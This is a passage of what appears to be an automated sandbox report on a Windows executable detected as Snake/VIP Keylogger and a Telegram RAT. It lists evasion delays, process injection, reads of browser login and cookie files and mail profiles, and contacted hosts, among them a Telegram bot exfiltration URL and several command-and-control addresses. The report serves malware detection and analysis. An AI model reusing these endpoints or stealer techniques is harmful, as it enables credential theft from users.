                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -594589s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe TID: 5940Thread sleep time: -594484s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 599109Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 599000Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 598672Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 598344Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 598219Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 598109Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 597999Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 597880Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 597765Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 597643Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 597528Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 597414Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 597281Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 597172Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 597062Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 596953Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 596844Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 596734Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 596625Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 596515Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 596406Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 596297Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 596187Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 596078Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 595969Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 595856Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 595749Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 595640Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 595531Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 595422Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 595312Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 595202Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 595091Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 594984Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 594822Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 594701Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 594589Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeThread delayed: delay time: 594484Jump to behavior
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3335567715.0000000000CA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_06739668 LdrInitializeThunk,1_2_06739668
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeMemory written: C:\Users\user\Desktop\XFo9jVGyLQ.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess created: C:\Users\user\Desktop\XFo9jVGyLQ.exe "C:\Users\user\Desktop\XFo9jVGyLQ.exe"Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeQueries volume information: C:\Users\user\Desktop\XFo9jVGyLQ.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeQueries volume information: C:\Users\user\Desktop\XFo9jVGyLQ.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.XFo9jVGyLQ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: XFo9jVGyLQ.exe PID: 7020, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: XFo9jVGyLQ.exe PID: 7072, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.XFo9jVGyLQ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: XFo9jVGyLQ.exe PID: 7020, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: XFo9jVGyLQ.exe PID: 7072, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.XFo9jVGyLQ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: XFo9jVGyLQ.exe PID: 7020, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: XFo9jVGyLQ.exe PID: 7072, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.XFo9jVGyLQ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: XFo9jVGyLQ.exe PID: 7020, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: XFo9jVGyLQ.exe PID: 7072, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.XFo9jVGyLQ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: XFo9jVGyLQ.exe PID: 7020, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: XFo9jVGyLQ.exe PID: 7072, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		111
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		1
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Disable or Modify Tools                		LSASS Memory1
                Process Discovery                		Remote Desktop Protocol11
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                Virtualization/Sandbox Evasion                		Security Account Manager31
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		3
                Ingress Tool Transfer                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                System Network Configuration Discovery                		SSHKeylogging14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials13
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Timestomp                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                XFo9jVGyLQ.exe75%VirustotalBrowse
                XFo9jVGyLQ.exe74%ReversingLabsWin32.Hacktool.Mimikatz
                XFo9jVGyLQ.exe100%AviraTR/AD.SnakeStealer.pabgo

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                		104.21.96.1
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    checkip.dyndns.com
                    		132.226.247.73
                    		truefalse
                      		high
                      checkip.dyndns.org
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          		high
                          http://checkip.dyndns.org/false
                            		high
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:887849%0D%0ADate%20and%20Time:%2009/03/2025%20/%2000:29:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20887849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.office.com/XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C53000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/ac/?q=XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.telegram.orgXFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B85000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.telegram.org/botXFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.ecosia.org/newtab/v20Y&XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://tempuri.org/DataSet1.xsdXFo9jVGyLQ.exefalse
                                          		high
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://ac.ecosia.org?q=XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://checkip.dyndns.orgXFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://chrome.google.com/webstore?hl=en4XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B85000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://chrome.google.com/webstore?hl=enXFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://varders.kozow.com:8081XFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://chrome.google.com/webstore?hl=enlBNrXFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://aborters.duckdns.org:8081XFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.google.com/images/branding/product/ico/googleg_alldp.icoXFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.office.com/4XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:887849%0D%0ADate%20aXFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B85000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://anotherarmy.dns.army:8081XFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://duckduckgo.com/chrome_newtabv20XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchXFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://checkip.dyndns.org/qXFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://reallyfreegeoip.org/xml/8.46.123.189$XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B18000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://reallyfreegeoip.orgXFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002AEE000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.office.com/lBNrXFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameXFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://gemini.google.com/app?q=XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedXFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                          		high
